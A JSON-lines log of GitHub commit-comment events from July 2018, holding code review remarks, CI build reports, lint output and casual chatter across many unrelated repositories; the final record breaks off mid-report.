{"id":"7997901869","type":"CommitCommentEvent","actor":{"login":"taoliug"},"repo":{"name":"pulp-platform/ariane"},"payload":{"comment":{"id":29786683,"position":17,"line":292,"path":"src/csr_regfile.sv","commit_id":"cd1db48d14923924edde18e3b9f2efa2040e021f","created_at":"2018-07-21T02:42:40Z","updated_at":"2018-07-21T02:42:40Z","author_association":"NONE","body":"mipe -> mpie"}},"created_at":"2018-07-21T02:42:40Z"}
{"id":"7997902303","type":"CommitCommentEvent","actor":{"login":"DyalogJenkins"},"repo":{"name":"Dyalog/MiServer"},"payload":{"comment":{"id":29786684,"position":null,"line":null,"path":null,"commit_id":"51dfdd98fee3146d5e9c0a6be958f7130036c233","created_at":"2018-07-21T02:43:06Z","updated_at":"2018-07-21T02:43:06Z","author_association":"MEMBER","body":"Build failed with output:\n```SQA failed to initialize\n MiServer for \"/MiServer/MS3\" started on http://172.17.0.3:8080              \n Running in Production mode (configured by setting <Production> in /Config/Se\n                \n       rver.xml)\n \"HandleRequest\" closed socket SRV00000000.CON00000000 due to error: 1001  ER\n       R_LENGTH    sending response\n \"HandleRequest\" closed socket SRV00000000.CON00000001 due to error: 1001  ER\n       R_LENGTH    sending response\n \"HandleRequest\" closed socket SRV00000000.CON00000002 due to error: 1001  ER\n       R_LENGTH    sending response\n \"HandleRequest\" closed socket SRV00000000.CON00000003 due to error: 1001  ER\n       R_LENGTH    sending response\n \"HandleRequest\" closed socket SRV00000000.CON00000004 due to error: 1001  ER\n       R_LENGTH    sending response\n \"HandleRequest\" closed socket SRV00000000.CON00000005 due to error: 1001  ER\n       R_LENGTH    sending response\n```"}},"created_at":"2018-07-21T02:43:06Z"}
{"id":"7997902811","type":"CommitCommentEvent","actor":{"login":"jywarren"},"repo":{"name":"imacubsfan23/plots2"},"payload":{"comment":{"id":29786685,"position":null,"line":null,"path":null,"commit_id":"d4e1cfd9d2602745a58a99d81bc6b045d786fac2","created_at":"2018-07-21T02:43:36Z","updated_at":"2018-07-21T02:43:36Z","author_association":"NONE","body":"Oh wow! Cool! @Souravirus what do you think of this? \r\n\r\nDo you think we could move the new scripts into /script/?"}},"created_at":"2018-07-21T02:43:36Z"}
{"id":"7997906984","type":"CommitCommentEvent","actor":{"login":"Gligory"},"repo":{"name":"slammagamma/hello-world"},"payload":{"comment":{"id":29786689,"position":null,"line":null,"path":null,"commit_id":"3f317b34b9a59e69d6cda7f574626331586a290b","created_at":"2018-07-21T02:47:23Z","updated_at":"2018-07-21T02:47:23Z","author_association":"COLLABORATOR","body":"i found it"}},"created_at":"2018-07-21T02:47:23Z"}
{"id":"7997907339","type":"CommitCommentEvent","actor":{"login":"slammagamma"},"repo":{"name":"slammagamma/hello-world"},"payload":{"comment":{"id":29786690,"position":null,"line":null,"path":null,"commit_id":"3f317b34b9a59e69d6cda7f574626331586a290b","created_at":"2018-07-21T02:47:42Z","updated_at":"2018-07-21T02:47:42Z","author_association":"OWNER","body":"what is this?"}},"created_at":"2018-07-21T02:47:42Z"}
{"id":"7997907523","type":"CommitCommentEvent","actor":{"login":"Gligory"},"repo":{"name":"slammagamma/hello-world"},"payload":{"comment":{"id":29786691,"position":null,"line":null,"path":null,"commit_id":"3f317b34b9a59e69d6cda7f574626331586a290b","created_at":"2018-07-21T02:47:53Z","updated_at":"2018-07-21T02:47:53Z","author_association":"COLLABORATOR","body":"its a virus"}},"created_at":"2018-07-21T02:47:53Z"}
{"id":"7997907577","type":"CommitCommentEvent","actor":{"login":"slammagamma"},"repo":{"name":"slammagamma/hello-world"},"payload":{"comment":{"id":29786692,"position":null,"line":null,"path":null,"commit_id":"3f317b34b9a59e69d6cda7f574626331586a290b","created_at":"2018-07-21T02:47:57Z","updated_at":"2018-07-21T02:47:57Z","author_association":"OWNER","body":"### **_get it out of here_**"}},"created_at":"2018-07-21T02:47:57Z"}
{"id":"7997907824","type":"CommitCommentEvent","actor":{"login":"slammagamma"},"repo":{"name":"slammagamma/hello-world"},"payload":{"comment":{"id":29786693,"position":null,"line":null,"path":null,"commit_id":"3f317b34b9a59e69d6cda7f574626331586a290b","created_at":"2018-07-21T02:48:09Z","updated_at":"2018-07-21T02:48:09Z","author_association":"OWNER","body":"sounds spicy"}},"created_at":"2018-07-21T02:48:09Z"}
{"id":"7997907943","type":"CommitCommentEvent","actor":{"login":"Gligory"},"repo":{"name":"slammagamma/hello-world"},"payload":{"comment":{"id":29786694,"position":null,"line":null,"path":null,"commit_id":"3f317b34b9a59e69d6cda7f574626331586a290b","created_at":"2018-07-21T02:48:14Z","updated_at":"2018-07-21T02:48:14Z","author_association":"COLLABORATOR","body":"> you should click it"}},"created_at":"2018-07-21T02:48:14Z"}
{"id":"7997908317","type":"CommitCommentEvent","actor":{"login":"slammagamma"},"repo":{"name":"slammagamma/hello-world"},"payload":{"comment":{"id":29786696,"position":null,"line":null,"path":null,"commit_id":"3f317b34b9a59e69d6cda7f574626331586a290b","created_at":"2018-07-21T02:48:34Z","updated_at":"2018-07-21T02:48:34Z","author_association":"OWNER","body":"wait. I already did"}},"created_at":"2018-07-21T02:48:34Z"}
{"id":"7997908424","type":"CommitCommentEvent","actor":{"login":"slammagamma"},"repo":{"name":"slammagamma/hello-world"},"payload":{"comment":{"id":29786697,"position":null,"line":null,"path":null,"commit_id":"3f317b34b9a59e69d6cda7f574626331586a290b","created_at":"2018-07-21T02:48:40Z","updated_at":"2018-07-21T02:48:40Z","author_association":"OWNER","body":"and now im dead"}},"created_at":"2018-07-21T02:48:40Z"}
{"id":"7997910665","type":"CommitCommentEvent","actor":{"login":"ExtendObject"},"repo":{"name":"andrewyunt/warfare"},"payload":{"comment":{"id":29786702,"position":null,"line":null,"path":null,"commit_id":"5db8505bd9e3851945c37eb62d6e3ce48092c0e5","created_at":"2018-07-21T02:50:42Z","updated_at":"2018-07-21T02:50:42Z","author_association":"NONE","body":"what's up stoner"}},"created_at":"2018-07-21T02:50:42Z"}
{"id":"7997910815","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/pyopengl-feedstock"},"payload":{"comment":{"id":29786703,"position":null,"line":null,"path":null,"commit_id":"d3303f11c480a8690b3a69a14f49c79dcef71476","created_at":"2018-07-21T02:50:50Z","updated_at":"2018-07-21T02:50:50Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @mcfletch was added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-21T02:50:50Z"}
{"id":"7997911118","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29786704,"position":null,"line":null,"path":null,"commit_id":"6cd6873cf7f4077a8cb37d27813c4526abe7b4c5","created_at":"2018-07-21T02:51:09Z","updated_at":"2018-07-21T02:51:09Z","author_association":"NONE","body":"kiva-non-quad-walls (nealkruis) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1690 of 1690 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6cd6873cf7f4077a8cb37d27813c4526abe7b4c5-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6cd6873cf7f4077a8cb37d27813c4526abe7b4c5-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6cd6873cf7f4077a8cb37d27813c4526abe7b4c5-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.02%25-green.png)</a>\n"}},"created_at":"2018-07-21T02:51:09Z"}
{"id":"7997912030","type":"CommitCommentEvent","actor":{"login":"liamxis"},"repo":{"name":"liamxis/100-Python-problems"},"payload":{"comment":{"id":29786705,"position":null,"line":null,"path":null,"commit_id":"5a1f7a268340a092a5a866e026fd56d8f8da25d0","created_at":"2018-07-21T02:51:55Z","updated_at":"2018-07-21T02:51:55Z","author_association":"OWNER","body":"总共有24个不同的数\r\n分别是：[123, 124, 132, 134, 142, 143, 213, 214, 231, 234, 241, 243, 312, 314, 321, 324, 341, 342, 412, 413, 421, 423, 431, 432]"}},"created_at":"2018-07-21T02:51:55Z"}
{"id":"7997915062","type":"CommitCommentEvent","actor":{"login":"pjcpjc"},"repo":{"name":"opalytics/opalytics-ticdat"},"payload":{"comment":{"id":29786709,"position":null,"line":null,"path":null,"commit_id":"f2ce491f8800046b57313229049475c723aa871f","created_at":"2018-07-21T02:54:43Z","updated_at":"2018-07-21T02:54:43Z","author_association":"CONTRIBUTOR","body":"Don't forget to test standard main with ticdat.\r\n\r\nAlso!! Don't forget that extra columns are never passed to AMPL via `PanDatFactory`. Remember, a `PanDat` is allowed to have extra columns."}},"created_at":"2018-07-21T02:54:43Z"}
{"id":"7997916024","type":"CommitCommentEvent","actor":{"login":"wbaumann"},"repo":{"name":"wbaumann/SmartReceiptsLibrary"},"payload":{"comment":{"id":29786710,"position":null,"line":null,"path":null,"commit_id":"9e063f57a4309d6acf46576afa2ec7b8412f062c","created_at":"2018-07-21T02:55:37Z","updated_at":"2018-07-21T02:55:37Z","author_association":"OWNER","body":"@JuliaSoboleva Good news - we now have a `Travis CI` build for Android :). So for any of our future commits, it should let us know if anything breaks!"}},"created_at":"2018-07-21T02:55:37Z"}
{"id":"7999126801","type":"CommitCommentEvent","actor":{"login":"joligario"},"repo":{"name":"EQEmu/Server"},"payload":{"comment":{"id":29789792,"position":5,"line":516,"path":"zone/exp.cpp","commit_id":"f51396aa70414798d3fa9d9c288feb18fb194b9f","created_at":"2018-07-21T20:04:46Z","updated_at":"2018-07-21T20:04:46Z","author_association":"CONTRIBUTOR","body":"\"and\" tripping appveyor"}},"created_at":"2018-07-21T20:04:46Z"}
{"id":"7999130395","type":"CommitCommentEvent","actor":{"login":"boundir"},"repo":{"name":"Ludeon/RimWorld-fr"},"payload":{"comment":{"id":29789800,"position":null,"line":null,"path":null,"commit_id":"52d23aa185e34783d79d8d2e5d4f0b7255bc9305","created_at":"2018-07-21T20:07:52Z","updated_at":"2018-07-21T20:07:52Z","author_association":"CONTRIBUTOR","body":"Par contre en effet il faut écrire en minuscule si la version originale est en minuscule."}},"created_at":"2018-07-21T20:07:52Z"}
{"id":"7999130466","type":"CommitCommentEvent","actor":{"login":"ScarletBillows"},"repo":{"name":"ScarletBillows/Joke"},"payload":{"comment":{"id":29789801,"position":null,"line":null,"path":null,"commit_id":"8bd9ea4e5287ddfa01b6af4d72092553663b26e9","created_at":"2018-07-21T20:07:56Z","updated_at":"2018-07-21T20:07:56Z","author_association":"OWNER","body":"result : Hello world"}},"created_at":"2018-07-21T20:07:56Z"}
{"id":"7999136102","type":"CommitCommentEvent","actor":{"login":"ahmedelgabri"},"repo":{"name":"filipekiss/zdotdir"},"payload":{"comment":{"id":29789811,"position":null,"line":null,"path":null,"commit_id":"e5841f91803b43aa6dd7291de778332d7cc38e06","created_at":"2018-07-21T20:12:45Z","updated_at":"2018-07-21T20:12:45Z","author_association":"NONE","body":"This is failing for me with the following error\r\n\r\n```\r\nexpand-ealias:2: failed to compile regex: repetition-operator operand invalid\r\n```"}},"created_at":"2018-07-21T20:12:45Z"}
{"id":"7999136379","type":"CommitCommentEvent","actor":{"login":"TiM-Sofar"},"repo":{"name":"TiM-Sofar/Self-Learning-Sheet-for-Markdown"},"payload":{"comment":{"id":29789812,"position":null,"line":null,"path":null,"commit_id":"e1f9ef73f948d802087009c2a0d33240cbbf9e55","created_at":"2018-07-21T20:12:58Z","updated_at":"2018-07-21T20:12:58Z","author_association":"OWNER","body":"(For you and me it's a content container (for the personal responsibility and commitment). If you follow this another one may use it for their needs (self-learning materials). Gradually you can use it for your other collaborative purposes."}},"created_at":"2018-07-21T20:12:58Z"}
{"id":"7999139668","type":"CommitCommentEvent","actor":{"login":"corey-mitchell"},"repo":{"name":"PROJECT-1-HACKERS/Project-1-BootCamp"},"payload":{"comment":{"id":29789823,"position":null,"line":null,"path":null,"commit_id":"c14b11d3f9c2fcedc2bc0117ad70d7f7561431a0","created_at":"2018-07-21T20:15:48Z","updated_at":"2018-07-21T20:15:48Z","author_association":"COLLABORATOR","body":"This is the greatest commit message I've ever seen LOL"}},"created_at":"2018-07-21T20:15:48Z"}
{"id":"7999140970","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"wszuwar/Task"},"payload":{"comment":{"id":29789830,"position":16,"line":18,"path":"src/test/java/com/crud/tasks/trello/mapper/TrelloMappertestSuite.java","commit_id":"ac35501ae6f833b31b45fe533515908572c3be49","created_at":"2018-07-21T20:16:56Z","updated_at":"2018-07-21T20:16:56Z","author_association":"NONE","body":"TrelloMapper to bean, powinieneś użyć @Autowired"}},"created_at":"2018-07-21T20:16:56Z"}
{"id":"7999141672","type":"CommitCommentEvent","actor":{"login":"asdhob"},"repo":{"name":"asdhob/skml"},"payload":{"comment":{"id":29789832,"position":null,"line":null,"path":null,"commit_id":"40dd8492afe6cfbe04ed1c33434635e257d5b6f2","created_at":"2018-07-21T20:17:32Z","updated_at":"2018-07-21T20:17:32Z","author_association":"OWNER","body":"Randomizing the order of Y variable labels, to acheieve better performance.\r\nAlso, the output given is in terms of probabilities."}},"created_at":"2018-07-21T20:17:32Z"}
{"id":"7999142311","type":"CommitCommentEvent","actor":{"login":"MineAnPlay"},"repo":{"name":"GTNewHorizons/GT5-Unofficial"},"payload":{"comment":{"id":29789833,"position":null,"line":null,"path":null,"commit_id":"3f1dbea050ca43850a006c04cf928a3203ca216c","created_at":"2018-07-21T20:18:05Z","updated_at":"2018-07-21T20:18:05Z","author_association":"NONE","body":"It should actually be Iron(III) Chloride :P"}},"created_at":"2018-07-21T20:18:05Z"}
{"id":"7999143001","type":"CommitCommentEvent","actor":{"login":"fryguy503"},"repo":{"name":"EQEmu/Server"},"payload":{"comment":{"id":29789834,"position":5,"line":516,"path":"zone/exp.cpp","commit_id":"f51396aa70414798d3fa9d9c288feb18fb194b9f","created_at":"2018-07-21T20:18:39Z","updated_at":"2018-07-21T20:18:39Z","author_association":"CONTRIBUTOR","body":"PR #750 submitted to resolve that, thank you for point that out."}},"created_at":"2018-07-21T20:18:39Z"}
{"id":"7999145466","type":"CommitCommentEvent","actor":{"login":"DmitriKudriashov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29789837,"position":3,"line":3,"path":"Lesson2/l2_task2_fill_array.rb","commit_id":"ccbd04c2a4c8a0c9350e410aac8529dfbc54762a","created_at":"2018-07-21T20:20:57Z","updated_at":"2018-07-21T20:20:57Z","author_association":"OWNER","body":"в данном случае мне было просто интересно проверить использование промежутка. \r\n"}},"created_at":"2018-07-21T20:20:57Z"}
{"id":"7999145989","type":"CommitCommentEvent","actor":{"login":"simsim314"},"repo":{"name":"circleofcircles/circleofcircles"},"payload":{"comment":{"id":29789839,"position":null,"line":null,"path":null,"commit_id":"aab4ffd664b77bd6afb85e8d5660da66a4bf1776","created_at":"2018-07-21T20:21:23Z","updated_at":"2018-07-21T20:21:23Z","author_association":"CONTRIBUTOR","body":"I think words are basically \"public entities\" but my point was not about the words, but the fact that every time we learn this public entity - we interpret it uniquely by our own references (internal language), which then is used to learn how our perspective is similar or different from others. More than that we can use words to modify our perspective at some way. "}},"created_at":"2018-07-21T20:21:23Z"}
{"id":"7999146662","type":"CommitCommentEvent","actor":{"login":"lorenzob"},"repo":{"name":"OCR-D/ocrd-train"},"payload":{"comment":{"id":29789844,"position":null,"line":null,"path":null,"commit_id":"0773d928701b1ad6b87a63ef6287b32e68199b90","created_at":"2018-07-21T20:21:59Z","updated_at":"2018-07-21T20:21:59Z","author_association":"NONE","body":"Hi, this commit changed the gt.txt extension to \"-gt.txt\" from \".gt.txt\". I think it should be set as before."}},"created_at":"2018-07-21T20:21:59Z"}
{"id":"7999146688","type":"CommitCommentEvent","actor":{"login":"ahmedelgabri"},"repo":{"name":"filipekiss/zdotdir"},"payload":{"comment":{"id":29789845,"position":null,"line":null,"path":null,"commit_id":"e5841f91803b43aa6dd7291de778332d7cc38e06","created_at":"2018-07-21T20:22:01Z","updated_at":"2018-07-21T20:22:01Z","author_association":"NONE","body":"Looks like this works fine & it doesn't depend on regex (I understand why regex is used, but I think I don't need it) https://github.com/robbyrussell/oh-my-zsh/blob/a1448e9f8a62164caae47a2f48f9c9766c1eaa60/plugins/globalias/globalias.plugin.zsh"}},"created_at":"2018-07-21T20:22:01Z"}
{"id":"7999146705","type":"CommitCommentEvent","actor":{"login":"echristopher2000"},"repo":{"name":"echristopher2000/github-slideshow"},"payload":{"comment":{"id":29789846,"position":null,"line":null,"path":null,"commit_id":"5a0b371179428f984d942c10addb0aa80f07625a","created_at":"2018-07-21T20:22:02Z","updated_at":"2018-07-21T20:22:02Z","author_association":"OWNER","body":"add to new folder post"}},"created_at":"2018-07-21T20:22:02Z"}
{"id":"7999155663","type":"CommitCommentEvent","actor":{"login":"dieuquocgia"},"repo":{"name":"ethereum-mining/ethminer"},"payload":{"comment":{"id":29789865,"position":null,"line":null,"path":null,"commit_id":"8ad03b0a301062b0e3d163b3b387c48c89df0f52","created_at":"2018-07-21T20:29:33Z","updated_at":"2018-07-21T20:29:33Z","author_association":"NONE","body":"cl 03:26:40 cl-2     Writing light cache buffer\r\ncl 03:26:40 cl-2     Creating buffer for header.\r\n X 03:26:40 cl-2     OpenCL init failed: clSetKernelArg: CL_INVALID_ARG_SIZE (-51)\r\n X 03:26:40 cl-2     OpenCL Error: clEnqueueWriteBuffer: CL_INVALID_MEM_OBJECT (-38)"}},"created_at":"2018-07-21T20:29:33Z"}
{"id":"7999157624","type":"CommitCommentEvent","actor":{"login":"ennui93"},"repo":{"name":"iputils/iputils"},"payload":{"comment":{"id":29789875,"position":null,"line":null,"path":null,"commit_id":"99f67db03d12b60f37b3af91f809f9f72bb1d29b","created_at":"2018-07-21T20:31:02Z","updated_at":"2018-07-21T20:31:02Z","author_association":"NONE","body":"@pevik Thanks for the fast reply. I confirm that 25899e849aa3abc1ad29ebf0b830262a859eaed5 fixes the issue. You are correct that I found this on a Gentoo system, specifically one making use of musl as the system libc."}},"created_at":"2018-07-21T20:31:02Z"}
{"id":"7999159215","type":"CommitCommentEvent","actor":{"login":"madig"},"repo":{"name":"googlefonts/fontbakery"},"payload":{"comment":{"id":29789909,"position":null,"line":null,"path":null,"commit_id":"ce360a13d95340e532bce7fd5c1e0f82ac9a0d44","created_at":"2018-07-21T20:32:24Z","updated_at":"2018-07-21T20:32:24Z","author_association":"CONTRIBUTOR","body":"This happens in a few other places as well. Maybe something for pyupgrade to handle automatically? Basically, replace f\"{something_without_colon_specifiers}\" with str(...)."}},"created_at":"2018-07-21T20:32:24Z"}
{"id":"7999159741","type":"CommitCommentEvent","actor":{"login":"NeverPire"},"repo":{"name":"Ludeon/RimWorld-fr"},"payload":{"comment":{"id":29789911,"position":null,"line":null,"path":null,"commit_id":"52d23aa185e34783d79d8d2e5d4f0b7255bc9305","created_at":"2018-07-21T20:32:51Z","updated_at":"2018-07-21T20:32:51Z","author_association":"CONTRIBUTOR","body":"J'avais plutôt réfléchi au fait que les autres éléments de la rubrique étaient en majuscule pour mon choix de la majuscule. Mais bon, ton argument est tout à fait correct."}},"created_at":"2018-07-21T20:32:51Z"}
{"id":"7999160172","type":"CommitCommentEvent","actor":{"login":"Cranite"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29789913,"position":63,"line":63,"path":"src/main/java/com/github/cranite/MoreEnchantables/Enchantment/EnchantmentEvents.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-21T20:33:13Z","updated_at":"2018-07-21T20:33:13Z","author_association":"NONE","body":"Done"}},"created_at":"2018-07-21T20:33:13Z"}
{"id":"7999160256","type":"CommitCommentEvent","actor":{"login":"Cranite"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29789914,"position":72,"line":72,"path":"src/main/java/com/github/cranite/MoreEnchantables/Enchantment/EnchantmentEvents.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-21T20:33:18Z","updated_at":"2018-07-21T20:33:18Z","author_association":"NONE","body":"Done"}},"created_at":"2018-07-21T20:33:18Z"}
{"id":"7999160351","type":"CommitCommentEvent","actor":{"login":"Cranite"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29789915,"position":78,"line":78,"path":"src/main/java/com/github/cranite/MoreEnchantables/Enchantment/EnchantmentEvents.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-21T20:33:22Z","updated_at":"2018-07-21T20:33:22Z","author_association":"NONE","body":"Done"}},"created_at":"2018-07-21T20:33:22Z"}
{"id":"7999160549","type":"CommitCommentEvent","actor":{"login":"Cranite"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29789916,"position":144,"line":144,"path":"src/main/java/com/github/cranite/MoreEnchantables/Enchantment/EnchantmentEvents.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-21T20:33:33Z","updated_at":"2018-07-21T20:33:33Z","author_association":"NONE","body":"Done"}},"created_at":"2018-07-21T20:33:33Z"}
{"id":"7999160931","type":"CommitCommentEvent","actor":{"login":"oscalvme"},"repo":{"name":"dbadillasanchez/factura-electronica-API-Ministerio-de-Hacienda-CR"},"payload":{"comment":{"id":29789918,"position":null,"line":null,"path":null,"commit_id":"5ce3aac372de64b81f1222d18cabfb7088703ef0","created_at":"2018-07-21T20:33:55Z","updated_at":"2018-07-21T20:33:55Z","author_association":"NONE","body":"Estimado  dbadillasanchez, me llamo Oscar Alvarado y soy de Costa Rica, tengo unas dudas en el codigo, me interesa mucho conversar con usted, mi numero es el 88970202, por favor llameme o nos escribimos por whatsapp GRACIAS!"}},"created_at":"2018-07-21T20:33:55Z"}
{"id":"7999161487","type":"CommitCommentEvent","actor":{"login":"etsangsplk"},"repo":{"name":"harlow/kinesis-consumer"},"payload":{"comment":{"id":29789924,"position":null,"line":null,"path":null,"commit_id":"739e9e39a585370c09c21aca94afc96b47225b22","created_at":"2018-07-21T20:34:25Z","updated_at":"2018-07-21T20:34:25Z","author_association":"CONTRIBUTOR","body":"It is just an adaptor. The builtin golang log function uses Println and other functions that is not usually available to leveled logging library (check glog or logrus). So it is a just an adaptor"}},"created_at":"2018-07-21T20:34:25Z"}
{"id":"7999161784","type":"CommitCommentEvent","actor":{"login":"oscalvme"},"repo":{"name":"dbadillasanchez/factura-electronica-API-Ministerio-de-Hacienda-CR"},"payload":{"comment":{"id":29789926,"position":null,"line":null,"path":null,"commit_id":"1c3f228e040913e7556cd87affd999c6ad46bf06","created_at":"2018-07-21T20:34:40Z","updated_at":"2018-07-21T20:34:40Z","author_association":"NONE","body":"Estimado  dbadillasanchez, me llamo Oscar Alvarado y soy de Costa Rica, tengo unas dudas en el codigo, me interesa mucho conversar con usted, mi numero es el 88970202, por favor llameme o nos escribimos por whatsapp GRACIAS!"}},"created_at":"2018-07-21T20:34:40Z"}
{"id":"7999161986","type":"CommitCommentEvent","actor":{"login":"oscalvme"},"repo":{"name":"dbadillasanchez/factura-electronica-API-Ministerio-de-Hacienda-CR"},"payload":{"comment":{"id":29789929,"position":null,"line":null,"path":null,"commit_id":"9d294cd2bbea1715f41a3ad11c31a09aaa151b3d","created_at":"2018-07-21T20:34:53Z","updated_at":"2018-07-21T20:34:53Z","author_association":"NONE","body":"Estimado  dbadillasanchez, me llamo Oscar Alvarado y soy de Costa Rica, tengo unas dudas en el codigo, me interesa mucho conversar con usted, mi numero es el 88970202, por favor llameme o nos escribimos por whatsapp GRACIAS!"}},"created_at":"2018-07-21T20:34:53Z"}
{"id":"7999162071","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29789930,"position":null,"line":null,"path":null,"commit_id":"759e9c18ed941c1b385906c24359c5c1948ddd9c","created_at":"2018-07-21T20:34:58Z","updated_at":"2018-07-21T20:34:58Z","author_association":"NONE","body":"#6842-WrongTempUsedInCalcRadSysHXEffectTerm (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2323 of 2323 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-759e9c18ed941c1b385906c24359c5c1948ddd9c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-759e9c18ed941c1b385906c24359c5c1948ddd9c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-759e9c18ed941c1b385906c24359c5c1948ddd9c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-21T20:34:58Z"}
{"id":"7999162081","type":"CommitCommentEvent","actor":{"login":"Cranite"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29789931,"position":62,"line":62,"path":"src/main/java/com/github/cranite/MoreEnchantables/Enchantment/EnchantmentUtility.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-21T20:34:58Z","updated_at":"2018-07-21T20:34:58Z","author_association":"NONE","body":"Done"}},"created_at":"2018-07-21T20:34:58Z"}
{"id":"7999163124","type":"CommitCommentEvent","actor":{"login":"oscalvme"},"repo":{"name":"dbadillasanchez/factura-electronica-API-Ministerio-de-Hacienda-CR"},"payload":{"comment":{"id":29789934,"position":null,"line":null,"path":null,"commit_id":"7d15674e81133cbb3cd2723f24124422933270a7","created_at":"2018-07-21T20:35:56Z","updated_at":"2018-07-21T20:35:56Z","author_association":"NONE","body":"Estimado  dbadillasanchez, me llamo Oscar Alvarado y soy de Costa Rica, tengo unas dudas en el codigo, me interesa mucho conversar con usted, mi numero es el 88970202, por favor llameme o nos escribimos por whatsapp GRACIAS!"}},"created_at":"2018-07-21T20:35:56Z"}
{"id":"7999163629","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29789936,"position":null,"line":null,"path":null,"commit_id":"759e9c18ed941c1b385906c24359c5c1948ddd9c","created_at":"2018-07-21T20:36:23Z","updated_at":"2018-07-21T20:36:23Z","author_association":"NONE","body":"#6842-WrongTempUsedInCalcRadSysHXEffectTerm (Nigusse) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-759e9c18ed941c1b385906c24359c5c1948ddd9c-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-21T20:36:23Z"}
{"id":"7999163790","type":"CommitCommentEvent","actor":{"login":"timotheecour"},"repo":{"name":"citycide/glob"},"payload":{"comment":{"id":29789937,"position":null,"line":null,"path":null,"commit_id":"6fada01bd98f875c8e1decd49e397cbcf50dedd1","created_at":"2018-07-21T20:36:31Z","updated_at":"2018-07-21T20:36:31Z","author_association":"CONTRIBUTOR","body":"just curious, what do you mean by \"chore\" in chore(version) ?"}},"created_at":"2018-07-21T20:36:31Z"}
{"id":"7999164122","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.behavior"},"payload":{"comment":{"id":29789939,"position":null,"line":null,"path":null,"commit_id":"9d528d94953ffa05076d56ec9107c8effd92bec9","created_at":"2018-07-21T20:36:49Z","updated_at":"2018-07-21T20:36:49Z","author_association":"NONE","body":"@gforcada Jenkins CI reporting about code analysis\nSee the full report here: https://jenkins.plone.org/job/package-plone.behavior/11/violations\n```\nplone/behavior/metaconfigure.py:83:65: C812 missing trailing comma\nplone/behavior/metaconfigure.py:106:71: C812 missing trailing comma\nplone/behavior/metaconfigure.py:111:25: C812 missing trailing comma\nplone/behavior/metaconfigure.py:137:35: C812 missing trailing comma\nplone/behavior/metaconfigure.py:149:35: C812 missing trailing comma\nplone/behavior/metaconfigure.py:156:73: C812 missing trailing comma\nplone/behavior/metaconfigure.py:169:21: C812 missing trailing comma\nplone/behavior/interfaces.py:33:22: C812 missing trailing comma\nplone/behavior/interfaces.py:38:23: C812 missing trailing comma\nplone/behavior/interfaces.py:46:23: C812 missing trailing comma\nplone/behavior/interfaces.py:52:26: C812 missing trailing comma\nplone/behavior/interfaces.py:62:26: C812 missing trailing comma\nplone/behavior/interfaces.py:68:25: 